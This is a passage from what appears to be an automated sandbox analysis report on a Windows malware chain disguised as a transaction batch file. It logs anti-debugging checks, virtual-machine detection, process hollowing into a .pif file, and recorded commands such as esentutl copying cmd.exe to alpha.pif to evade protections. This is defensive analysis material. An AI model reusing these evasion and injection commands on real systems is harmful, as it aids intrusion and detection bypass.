Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598222	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598068	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597946	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596981	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596767	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596640	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596528	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596416	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596304	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596050	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595810	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595698	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595585	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595249	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595123	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594911	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594789	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594677	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594564	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594439	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594313	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594177	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593997	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593658	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593506	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593369	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593196	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 593011	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 592620	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 592105	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 591918	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 591659	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599672
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599124
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599007
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598780
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598422
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598297
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598172
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598062
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597953
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597844
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597719
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597609
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597500
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597391
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597281
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597172
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597062
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596953
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596844
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596734
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596625
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596515
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596406
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596297
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596187
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596078
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595932
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595813
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595700
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595579
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595466
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595016
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594906
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594797
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594687
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594578
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594469
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594344
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599889
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599671
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599343
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 599015
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598906
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598796
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598686
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598578
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598461
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598310
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598185
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 598078
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597968
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597859
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597750
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597640
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597531
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597421
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597312
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597203
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 597093
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596981
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596875
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596765
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596656
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596546
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596437
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596328
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596218
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 596109
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595999
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595890
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595781
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595671
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595562
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595453
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595343
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595234
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595125
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 595015
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594891
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594765
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594656
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594546
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Thread delayed: delay time: 594437

Source: Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000887000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW7
Source: x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: xrbjyllC.pif, 00000009.00000003.1838900521.000000002C2A7000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887148378.000000002C2A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: xrbjyllC.pif, 00000011.00000003.2131319058.0000000025AB9000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937690735.0000000025AB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
Source: xrbjyllC.pif, 0000000B.00000003.1970886725.000000002A373000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1970981133.000000002A383000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2040276262.000000002A370000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww

Source: C:\Users\user\AppData\Local\Temp\x.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\xrbjyllC.pif	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\xrbjyllC.pif	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	API call chain: ExitProcess graph end node

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031DF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

3_2_031DF744

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\x.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process queried: DebugPort	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

9_2_0040CE09

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Users\Public\Libraries\xrbjyllC.pif

9_2_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_031D894C LoadLibraryW,GetProcAddress,FreeLibrary,

3_2_031D894C

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Code function: 9_2_0040ADB0 GetProcessHeap,HeapFree,

9_2_0040ADB0

Enables debug privileges

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_1_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_1_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_1_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 9_1_004123F1 SetUnhandledExceptionFilter,	9_1_004123F1
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_2_004123F1 SetUnhandledExceptionFilter,	11_2_004123F1
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_1_0040CE09
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_1_0040E61C
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_1_00416F6A
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: 11_1_004123F1 SetUnhandledExceptionFilter,	11_1_004123F1

Source: C:\Users\Public\Libraries\xrbjyllC.pif

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Memory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Memory allocated: C:\Users\Public\Libraries\xrbjyllC.pif base: 400000 protect: page execute and read and write

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\SysWOW64\esentutl.exe

File created: C:\Users\Public\alpha.pif

Jump to dropped file

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\x.exe	Section unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Section unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Section unmapped: C:\Users\Public\Libraries\xrbjyllC.pif base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 3AF008	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Memory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 382008	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Memory written: C:\Users\Public\Libraries\xrbjyllC.pif base: 283008

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Process created: C:\Users\Public\Libraries\xrbjyllC.pif C:\Users\Public\Libraries\xrbjyllC.pif

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	3_2_031C5ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	3_2_031CA7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	3_2_031C5BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	3_2_031CA810
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: GetLocaleInfoA,	9_2_00417A20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: GetLocaleInfoA,	9_1_00417A20
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	10_2_031A5ACC
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	10_2_031A5BD7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: GetLocaleInfoA,	10_2_031AA810
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: GetLocaleInfoA,	11_2_00417A20
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Code function: GetLocaleInfoA,	11_1_00417A20
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	16_2_03195ACC
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	16_2_03195BD7
Source: C:\Users\Public\Libraries\Cllyjbrx.PIF	Code function: GetLocaleInfoA,	16_2_0319A810

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
